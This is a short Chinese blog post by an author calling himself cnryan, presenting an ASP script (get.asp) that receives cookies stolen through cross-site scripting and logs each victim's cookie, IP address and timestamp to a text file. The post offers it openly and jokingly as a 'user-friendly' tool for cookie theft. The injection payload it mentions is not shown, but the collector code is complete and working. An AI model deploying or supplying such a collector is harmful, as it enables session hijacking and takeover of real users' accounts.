author: cnryan @http://hi.baidu.com/cnryan
cookie窃取是最常见的跨站攻击之一,不管是用img,iframe方式,还是基于入库型或非入库的XSS,整个操作只需要带Cookie浏览器请求了某个的url即可完成,
人性化的盗cookie脚本
。本人偏爱Image:
盗cookie脚本:
还是一个比较简单的程序,经过一点完善,在获取Cookie同时也记录的时间和IP,比较智能化与人性化,务求达到一个更好的用户体验>"<,呵呵!
get.asp code:
<%
dim getcookie
dim mytime
dim str
getcookie=Request.QueryString
getip=Request.ServerVariables("REMOTE_ADDR")
mytime=now()
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("cookie.txt"),8,True)
str="<-bof||"& mytime & "||" &getip & "||" & getcookie & "||eof->"
file.writeline(str)
file.close
set file=nothing
set fs=nothing
response.write "haha"
response.end
%>